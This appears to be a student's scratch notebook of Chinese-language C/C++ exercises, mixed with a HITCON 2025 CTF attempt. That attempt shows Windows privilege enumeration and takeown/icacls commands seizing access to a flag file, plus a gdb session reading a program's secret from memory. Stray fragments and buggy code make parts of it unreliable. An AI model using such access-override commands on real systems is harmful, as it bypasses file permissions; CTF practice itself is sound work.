height; scanf("%d", &height); count[height]++; // 統計每個身高出現次數 } int max_count = 0;幹娘 int max_height = 0; for (int i = 0; i <= 200; i++) { if (count[i] > max_count) { max_count = count[i]; max_height = i; } } printf("%d %d\n", max_height, max_count); return 0; } ``` ``` #include <stdio.h> #include <math.h> int main() { double a, b, c; scanf("%lf%lf%lf", &a, &b, &c); if (a == 0) { printf("不是拋物線"); return 0; } if (b*b - 4*a*c < 0) { printf("沒有實根"); return 0; } double ans1 = (-b + sqrt(b*b - 4*a*c)) / (2*a); double ans2 = (-b - sqrt(b*b - 4*a*c)) / (2*a); if (ans2>ans1){ printf("%.3lf, %.3lf\n", ans2, ans1); } else { printf("%.3lf, %.3lf\n", ans1, ans2); } return 0; } ``` ``` #include <stdio.h> #include <math.h> int main() { double a, b, c; scanf("%lf%lf%lf", &a, &b, &c); if (a == 0) { printf("不是拋物線\n"); return 0; } else if (b*b - 4*a*c < 0) { printf("沒有實根\n"); return 0; } else{ double ans1 = (-b + sqrt(b*b - 4*a*c)) / (2*a); double ans2 = (-b - sqrt(b*b - 4*a*c)) / (2*a); printf("%.3lf, %.3lf\n", ans1, ans2); } return 0; } ``` ``` #include <bits/stdc++.h> using namespace std; int main() { double a , b , c , d ; cin >> a >> b >> c ; d = b*b-4*a*c ; if(a==0) { cout << "不是拋物線" <<"\n"; } else if(d<0) { cout<< "沒有實根" <<"\n"; } else if(d>0) { cout<<fixed<<setprecision(3)<<(-b+sqrt(d))/(2*a)<<", "<<fixed<<setprecision(3)<<(-b-sqrt(d))/(2*a)<<"\n"; } else cout<<fixed<<setprecision(3)<<-b/(2*a)<<", "<<fixed<<setprecision(3)<<-b/(2*a)<<"\n"; return 0; } ``` ```cpp= #include <bits/stdc++.h> using namespace std; struct t { string name, gmail, p[3]; int num, rank = 1E9; bool att = 0, nan, a = 0; }; t team[154], final[40]; bool rank_cmp(t a, t b) { if (a.att != b.att) return a.att > b.att; return a.rank < b.rank; } bool name_cmp(t a, t b) { return a.name < b.name; } int main() { cin.tie(0), ios::sync_with_stdio(0); for(int i = 0; i < 154; i++) { cin >> team[i].name >> team[i].gmail >> team[i].num; for(int j = 0; j < team[i].num; j++) { cin >> team[i].p[j]; } bool tmp; for(int j = 0; j < team[i].num; j++) { cin >> tmp; team[i].nan = max(tmp, team[i].nan); } } string name; for(int i = 0; i < 144; i++) { cin >> name; for(int j = 0; j < 154; j++) { if (team[j].name == name) team[j].rank = i; } } string gmail; int chuxi; for(int i = 0; i < 86; i++) { cin >> name >> gmail >> chuxi; for(int j = 0; j < 156; j++) { if (team[j].name == name && team[j].gmail != gmail) { cout << "-1\n"; return 0; } else if (team[j].name == name) team[j].att = chuxi; } } sort(team, team + 154, rank_cmp); for(int i = 0 ; i < 154; i++) { if (team[i].name == "aiCJzzZXS") { cout << team[i].att << ' '<< i << '\n'; } } int flag = 0, id; for(id = 0; id < 154; id++) { if (team[id].att) { final[flag++] = team[id], team[id].a = 1; } if (flag == 25) break; } int id2 = id; for(; id2 < 154; id2++) { if (team[id2].att && team[id2].nan && !team[id].a) { final[flag++] = team[id2]; } if (flag == 36) break; } for(;id < 154; id++) { if (id < id2 && team[id].att && !team[id].nan && !team[id].a) { final[flag++] = team[id]; } else if (team[id].att && !team[id].a) { final[flag++] = team[id]; } if (flag == 40) break; } sort(final, final + 40, name_cmp); int sum = 0; for(int i = 0; i < 40; i++) sum += final[i].num; cout << sum << '\n'; for(int i = 0; i < 40; i++) { cout << final[i].name << '\n'; } return 0; } #include <bits/stdc++.h> using namespace std; int main() { cin.tie(0), ios::sync_with_stdio(0); int n,q; cin>>n>>q; vector<int> a(n); vector<int> x(n); vector<int> wall(n); for (int i = 0; i < n; i++){ cin>>a[i]; } for (int i = 0; i < n; i++){ cin>>x[i]; } for (int i = 0; i < n; i++){ wall[a[i]] += x[i]; } while (q--){ int l,r,k; cin>>l>>r>>k; vector <int>ans(r-l); for (int i = l; i <=r; i++) { ans.push_back(wall[i]); sort(ans.begin(),ans.end(),greater<int>()); for (int i = 0; i < (int)ans.size(); i++) { if(ans[i] ==0) ans.pop_back(); } sort(ans.begin(),ans.end()); } if((int)ans.size() > k){ cout<<ans[ans.size()-k+1]<<"\n"; } else{ cout<<-1<<"\n"; } } return 0; } ``` ``` ``` #include <bits/stdc++.h> using namespace std; struct t { string name, gmail, p[3]; int num, rank = 1E9; bool att = false, nan = false, a = false; }; t team[154], final_list[40]; bool rank_cmp(const t &A, const t &B) { if (A.att != B.att) return A.att > B.att; return A.rank < B.rank; } bool name_cmp(const t &A, const t &B) { return A.name < B.name; } int main(){ ios::sync_with_stdio(false); cin.tie(nullptr); // 1. 讀入所有隊伍 for(int i = 0; i < 154; i++){ cin >> team[i].name >> team[i].gmail >> team[i].num; for(int j = 0; j < team[i].num; j++){ cin >> team[i].p[j]; } // 讀入性別 (0/1) bool tmp; for(int j = 0; j < team[i].num; j++){ cin >> tmp; team[i].nan = team[i].nan || tmp; } } // 2. 填入排名 string name; for(int i = 0; i < 144; i++){ cin >> name; for(int j = 0; j < 154; j++){ if(team[j].name == name){ team[j].rank = i; break; } } } // 3. 讀取出席資訊,並檢查 Gmail string gmail; int chuxi; for(int i = 0; i < 86; i++){ cin >> name >> gmail >> chuxi; bool found = false; for(int j = 0; j < 154; j++){ if(team[j].name == name){ found = true; if(team[j].gmail != gmail){ cout << "-1\n"; return 0; } team[j].att = chuxi; break; } } if(!found){ cout << "-1\n"; return 0; } } // 4. 依「出席+排名」排序 sort(team, team+154, rank_cmp); // (測試輸出某隊) for(int i = 0; i < 154; i++){ if(team[i].name == "aiCJzzZXS"){ cout << team[i].att << " " << i << "\n"; } } // 5. 先選前 25 名(有出席) int cnt = 0, cutoff = 0; for(; cutoff < 154 && cnt < 25; cutoff++){ if(team[cutoff].att){ final_list[cnt++] = team[cutoff]; team[cutoff].a = true; } } // 6. 再選第 26~36 名:女性優先 int id2 = cutoff; for(int j = cutoff; j < 154 && cnt < 36; j++){ if(team[j].att && team[j].nan && !team[j].a){ final_list[cnt++] = team[j]; team[j].a = true; } } // 7. 補足到 40 名:先非女性,再不分性別 // 7a. 補非女性 for(int j = cutoff; j < 154 && cnt < 40; j++){ if(team[j].att && !team[j].nan && !team[j].a){ final_list[cnt++] = team[j]; team[j].a = true; } } // 7b. 補剩餘 for(int j = 0; j < 154 && cnt < 40; j++){ if(team[j].att && !team[j].a){ final_list[cnt++] = team[j]; team[j].a = true; } } // 8. 最後按名字排序並輸出 sort(final_list, final_list+40, name_cmp); int sum = 0; for(int i = 0; i < 40; i++) sum += final_list[i].num; cout << sum << "\n"; for(int i = 0; i < 40; i++){ cout << final_list[i].name << "\n"; } return 0; } ```cpp! #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> int main() { int seed; scanf("%d", &seed); srand(seed); int times; scanf("%d", &times); int sum[13]; memset(sum, 0, sizeof(sum)); for (int i = 0; i < times; i++) { int die1 = rand() % 6 + 1; int die2 = rand() % 6 + 1; int r = die1 + die2; sum[r]++; } for (int i = 2; i <= 12; i++) { printf("%d 出現過 %d 次\n", i, sum[i]); } return 0; } JifigsAz8BRkBMy ``` ``` whoami whoami /groups whoami /priv net user %USERNAME% ``` Microsoft Windows [版本 10.0.19045.3803] (c) Microsoft Corporation. 著作權所有,並保留一切權利。 C:\Users\XDDD>whoamiwhoami /groupswhoami /privnet user %USERNAME% 'whoamiwhoami' 不是內部或外部命令、可執行的程式或批次檔。 C:\Users\XDDD>whoami desktop-ge3su1i\xddd C:\Users\XDDD>whoami /groups GROUP INFORMATION ----------------- 群組名稱 類型 SID 屬性 ================================================= ========== ============ ==================================== Everyone 知名的群組 S-1-1-0 強制性群組, 預設為啟用, 已啟用的群組 NT AUTHORITY\本機帳戶與 Administrators 群組的成員 知名的群組 S-1-5-114 僅用於拒絕的群組 BUILTIN\Administrators 別名 S-1-5-32-544 僅用於拒絕的群組 BUILTIN\Users 別名 S-1-5-32-545 強制性群組, 預設為啟用, 已啟用的群組 NT AUTHORITY\INTERACTIVE 知名的群組 S-1-5-4 強制性群組, 預設為啟用, 已啟用的群組 CONSOLE LOGON 知名的群組 S-1-2-1 強制性群組, 預設為啟用, 已啟用的群組 NT AUTHORITY\Authenticated Users 知名的群組 S-1-5-11 強制性群組, 預設為啟用, 已啟用的群組 NT AUTHORITY\This Organization 知名的群組 S-1-5-15 強制性群組, 預設為啟用, 已啟用的群組 NT AUTHORITY\本機帳戶 知名的群組 S-1-5-113 強制性群組, 預設為啟用, 已啟用的群組 LOCAL 知名的群組 S-1-2-0 強制性群組, 預設為啟用, 已啟用的群組 NT AUTHORITY\NTLM Authentication 知名的群組 S-1-5-64-10 強制性群組, 預設為啟用, 已啟用的群組 Mandatory Label\Medium Mandatory Level 標籤 S-1-16-8192 C:\Users\XDDD>whoami /priv PRIVILEGES INFORMATION ---------------------- 特殊權限名稱 描述 狀況 ============================= ================== ====== SeShutdownPrivilege 關閉系統 已停用 SeChangeNotifyPrivilege 略過周遊檢查 已啟用 SeUndockPrivilege 從擴充座移除電腦 已停用 SeIncreaseWorkingSetPrivilege 增加處理程序工作組 已停用 SeTimeZonePrivilege 變更時區 已停用 C:\Users\XDDD>net user %USERNAME% 使用者名稱 XDDD 全名 註解 使用者的註解 國家/區域碼 000 (系統預設值) 帳戶使用中 Yes 帳戶到期 從不 上次設定密碼 2025/10/16 上午 01:27:59 密碼到期 從不 可變更密碼 2025/10/16 上午 01:27:59 請輸入密碼 No 使用者可以變更密碼 Yes 容許的工作站 全部 登入指令檔 使用者設定檔 主目錄 上次登入時間 2025/10/17 下午 01:01:46 可容許的登入時數 全部 本機群組會員 *Administrators 全域群組會員 *None 命令已經成功完成。 C:\Users\XDDD> powershell -Command "Start-Process cmd -Verb runAs" icacls "C:\Users\XDDD\Desktop\flag.txt" takeown /F "C:\Users\XDDD\Desktop\flag.txt" /A icacls "C:\Users\XDDD\Desktop\flag.txt" /grant XDDD:F icacls "C:\Users\XDDD\Desktop\flag.txt" /grant Administrators:F type "C:\Users\XDDD\Desktop\flag.txt" http://hitcon.9ay.us/chat _Check_with_AI_hitcon-2025} hitcon{M@ster_oF_Driv5!!!_and_Check_with_AI_hitcon-2025} 請通過最後的試煉,向http://hitcon.9ay.us/chat 發出請求證明你是正確的答案(說明自己的解題流程) ```c #include <stdio.h> #include <stdlib.h> int main(void) { int seed; long long n; scanf("%d", &seed); scanf("%lld", &n); srand(seed); long long count1[13] = {0}; long long count2[13] = {0}; for (long long i = 0; i < n; ++i) { int d1 = rand() % 6 + 1; int d2 = rand() % 6 + 1; int sum = d1 + d2; count1[sum]++; } for (long long i = 0; i < n; ++i) { int d1 = (int)(rand() / (RAND_MAX + 1.0) * 6) + 1; int d2 = (int)(rand() / (RAND_MAX + 1.0) * 6) + 1; int sum = d1 + d2; count2[sum]++; } printf("方法一\n"); for (int s = 2; s <= 12; ++s) { printf("%d 出現過 %lld 次", s, count1[s]); (s<12)?printf("\n"):printf(""); } printf("\n方法二\n"); for (int s = 2; s <= 12; ++s) { printf("%d 出現過 %lld 次", s, count2[s]); printf("\n"); } return 0; } ``` ``` #include <stdio.h> #include <stdlib.h> int main(void) { int scores[2][3][5][3]; const char *subjName[3] = { "國文", "英文", "數學" }; for (int y = 0; y < 2; ++y) { for (int c = 0; c < 3; ++c) { for (int s = 0; s < 5; ++s) { for (int sub = 0; sub < 3; ++sub) { int v; while (1) { int ret = scanf("%d", &v); if (ret == 1) break; int ch = getchar(); } scores[y][c][s][sub] = v; } } } } for (int sub = 0; sub < 3; ++sub) { for (int y = 0; y < 2; ++y) { for (int c = 0; c < 3; ++c) { double sum = 0.0; for (int s = 0; s < 5; ++s) sum += scores[y][c][s][sub]; double avg = sum / 5; printf("%d年%d班學生%s成績平均為 %.2f\n", y + 1, c + 1, subjName[sub], avg); } } } return 0; } ``` ```c #include <stdio.h> #include <stdlib.h> #include <time.h> int main( void ) { int *answer; int guess; srand( time( NULL ) ); while( 1 ) { answer = ( int * ) malloc( sizeof( int ) ); *answer = ( int )( rand() ); guess = -1; while( guess != *answer ) { printf( "Input your guess: " ); scanf( "%d", &guess ); if( guess < *answer ) printf( "Too small!!\n"); else if( guess > *answer ) printf( "Too big!!\n" ); else printf( "Correct! Generating new number.\n"); } free( answer ); } return 0; } ``` ``` start b malloc c finish set $ans = (int*)$rax watch *$ans c x/d $ans ins202@203-A-15:/mnt/c/Users/User/Desktop$ gdb ./1110 GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.2) 9.2 Copyright (C) 2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./1110... (No debugging symbols found in ./1110) (gdb) start Temporary breakpoint 1 at 0x1229 Starting program: /mnt/c/Users/User/Desktop/1110 Temporary breakpoint 1, 0x0000000008001229 in main () (gdb) b malloc Breakpoint 2 at 0x7fffff64a0e0: malloc. (2 locations) (gdb) c Continuing. Breakpoint 2, __GI___libc_malloc (bytes=4) at malloc.c:3023 3023 malloc.c: No such file or directory. (gdb) finish Run till exit from #0 __GI___libc_malloc (bytes=4) at malloc.c:3023 0x000000000800125f in main () Value returned is $1 = (void *) 0x80052a0 (gdb) set $ans = (int*)$rax (gdb) watch *$ans Hardware watchpoint 3: *$ans (gdb) c Continuing. Breakpoint 2, __GI___libc_malloc (bytes=512) at malloc.c:3023 3023 in malloc.c (gdb) x/d $ans 0x80052a0: 1430256804 (gdb) c Continuing. Breakpoint 2, __GI___libc_malloc (bytes=512) at malloc.c:3023 3023 in malloc.c (gdb) c Continuing. Input your guess: 1430256804 Correct! Generating new number. Breakpoint 2, __GI___libc_malloc (bytes=4) at malloc.c:3023 3023 in malloc.c (gdb) q A debugging session is active. Inferior 1 [process 1010] will be killed. Quit anyway? (y or n) y ``` ![image](https://hackmd.io/_uploads/S1RKpbkeWg.png) ![image](https://hackmd.io/_uploads/H1oqa-yg-g.png) ``` P1 ┏━━━━┳━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━┓ ┃ id ┃ score ┃ node_count ┃ received ┃ correct ┃ elapsed_secs ┃ ┡━━━━╇━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━┩ │ 1 │ 36.14 │ 2 │ 50 │ 43 │ 3.827 │ └────┴───────┴────────────┴──────────┴─────────┴──────────────┘ Update P1 score '36.14285714285714' P2 ┏━━━━┳━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━┓ ┃ id ┃ score ┃ node_count ┃ received ┃ correct ┃ elapsed_secs ┃ ┡━━━━╇━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━┩ │ 1 │ 11.6 │ 3 │ 50 │ 41 │ 1.438 │ └────┴───────┴────────────┴──────────┴─────────┴──────────────┘ Update P2 score '11.600000000000001' P3 ┏━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━┳━━━━━━━┳━━━━━━━━┳━━━━━━━┓ ┃ id ┃ score ┃ node… ┃ qsor… ┃ qsor… ┃ sha_… ┃ sha_c… ┃ crc3… ┃ crc32… ┃ elap… ┃ ┡━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━╇━━━━━━━╇━━━━━━━━╇━━━━━━━┩ │ 1 │ 35.22 │ 4 │ 20 │ 20 │ 20 │ 20 │ 20 │ 20 │ 6.25 │ └────┴───────┴───────┴───────┴───────┴───────┴────────┴───────┴────────┴───────┘ Update P3 score '35.21739130434783' 82.96 ```